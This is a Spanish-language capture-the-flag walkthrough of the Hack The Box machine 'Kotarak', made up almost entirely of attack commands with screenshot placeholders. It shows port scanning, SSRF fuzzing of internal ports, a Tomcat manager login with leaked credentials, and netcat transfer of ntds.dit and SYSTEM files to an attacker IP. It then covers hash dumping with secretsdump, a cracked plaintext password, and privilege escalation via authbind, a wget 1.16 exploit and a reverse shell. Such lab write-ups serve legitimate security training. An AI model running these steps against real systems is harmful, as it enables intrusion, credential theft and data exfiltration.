nmap -A -p- -oA kotarak 10.129.1.117 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210825115411.png

nmap -sC -sV -O -p- -oA kotarak 10.129.1.117

nmap -sU -O -p- -oA kotarak-udp 10.129.1.117

Pasted image 20210825115520.png

nmap -sCV -p80,443 10.129.1.117 -oN targeted

Pasted image 20210825115731.png

whatweb 10.129.1.117

Pasted image 20210825120054.png

http://10.129.1.117:60000

Pasted image 20210825120218.png

wfuzz -c -t 400 --hc=404 --hh=3 -z range, 1-65535 http://10.129.1.117:60000/url.php?path=http://localhost:FUZZ

Pasted image 20210825121558.png

http://10.129.1.117:60000/url.php?path=http://localhost:888?doc=backup

Pasted image 20210825122202.png

http://10.129.1.117:8080/manager/html

Ponemos las credenciales que encontramos en el grafico anterior.

Pasted image 20210825122503.png

Pasted image 20210825122823.png

Pasted image 20210825123104.png

python -c 'import pty; pty.spawn("/bin/bash")'

(CTRL+ Z)

stty raw -echo; fg reset xterm export TERM=xterm export SHELL=bash

Pasted image 20210825123848.png

find \-name user.txt 2>/dev/null | xargs cat

Pasted image 20210825124504.png

Vemos los archivos .dit y .bin

Transferimos archivos

nc 10.10.14.25 443 < 20170722._089134.bin

nc -lvnp 443 > ntds.bin

Pasted image 20210825125351.png

nc 10.10.14.25 443 < 20170722._089134.dit

nc -lvnp 443 > ntds.dit

file *

Pasted image 20210825130035.png

mv ntds.bin SYSTEM

mv ntds.dit ntds

Pasted image 20210825131734.png

python3 /opt/impacket/example/secretsdump.py -ntds ntds -system SYSTEM LOCAL

Pasted image 20210825132141.png

Vemos el hash de atanas

Pasted image 20210825132237.png

cat hash | awk '{print $4}' FS=":" | xclip -sel clip

Pasted image 20210825132708.png

Vamos a crackstation y vemos las credenciales

Pasted image 20210825132823.png

su atanas

password: f16tomcat!

Pasted image 20210825135239.png

ls -l /etc/authbind

Pasted image 20210825151756.png

authbind nc -lvnp 80

Pasted image 20210825161311.png

Vemos que la version de wget es 1.16

Pasted image 20210825161550.png

Cambiamos la ip y hacemos un reverse shell en el script.

Pasted image 20210826104932.png

authbind python -m pyftpdlib -p21 -w

Pasted image 20210826105546.png

authbind python exploit.py

Pasted image 20210826110302.png

Pasted image 20210826120650.png

nc -lvnp 443

boxes

copyright©2022 Cu3rv0x all rights reserved